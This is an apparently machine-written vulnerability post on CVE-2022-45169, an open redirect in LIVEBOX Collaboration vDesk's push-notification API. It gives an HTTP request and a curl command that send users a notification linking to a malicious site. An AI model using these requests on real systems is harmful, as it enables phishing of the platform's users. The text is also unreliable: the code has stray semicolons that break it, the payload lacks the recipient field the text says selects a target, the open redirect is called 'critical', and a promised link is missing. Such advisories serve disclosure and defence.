A security vulnerability, identified as CVE-2022-45169, has been discovered in LIVEBOX Collaboration vDesk (versions up to v031). This vulnerability allows for a URL redirection to an untrusted site (Open Redirect) under the /api/v1/notification/createnotification endpoint. As an authenticated user, you can send an arbitrary push notification to any other user of the system. This push notification can include an (invisible) clickable link. This vulnerability post will provide code snippets, references to original sources, and exploit details in simple American English.

Vulnerability Details

The vulnerability exists in the /api/v1/notification/createnotification endpoint within the LIVEBOX Collaboration vDesk application. The endpoint allows authenticated users to create push notifications with embedded clickable links. Due to a lack of validation and filtering, the endpoint can be manipulated to redirect users to malicious websites. This opens a potential gateway for further social engineering or phishing attacks on the targeted user.

For example, the following code snippet demonstrates the exploited endpoint

POST /api/v1/notification/createnotification HTTP/1.1<br>Host: example.com<br>Content-Type: application/json<br>Authorization: Bearer usertoken<br>{<br>"title": "New Document Shared",<br>"message": "You have a new document shared with you",<br>"url": "http://malicious-site.com"<br>;}

In this code snippet, the user crafted url parameter, containing a link to the malicious website. This URL is embedded within the push notification that is sent to the targeted user.

Exploiting the Vulnerability

To exploit CVE-2022-45169, you must first authenticate as a user within the LIVEBOX Collaboration vDesk system. Once authenticated, you can use various tools such as curl, Postman, or Burp Suite to craft the malicious push notification containing the untrusted link.

An example exploit using curl may look like the following

curl -X POST "https://example.com/api/v1/notification/createnotification"; \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer usertoken" \
  -d '{ "title": "New Document Shared", "message": "You have a new document shared with you", "url": "http://malicious-site.com" }'

This exploit will send a push notification to any specified user, containing the malicious URL embedded within.

Original References

The original source that discovered and reported this vulnerability is the CVE List by the MITRE Corporation.

For more information about the LIVEBOX Collaboration vDesk application, you can visit their official website here.

Mitigation and Recommendations

To protect yourself from the CVE-2022-45169 vulnerability, it is essential to regularly update your LIVEBOX Collaboration vDesk application to the latest version. Additionally, be cautious when clicking on links within push notifications and verify the destination URL before opening it.

Conclusion

CVE-2022-45169 is a critical security vulnerability that affects the LIVEBOX Collaboration vDesk application (up to v031). Exploitation of this vulnerability allows authenticated users to send malicious push notifications containing untrusted links. By staying vigilant and updating your software regularly, you can protect yourself and other users from potential social engineering and phishing attacks.

Timeline

Published on: 02/21/2024 16:15:49 UTC
Last modified on: 03/19/2024 16:48:23 UTC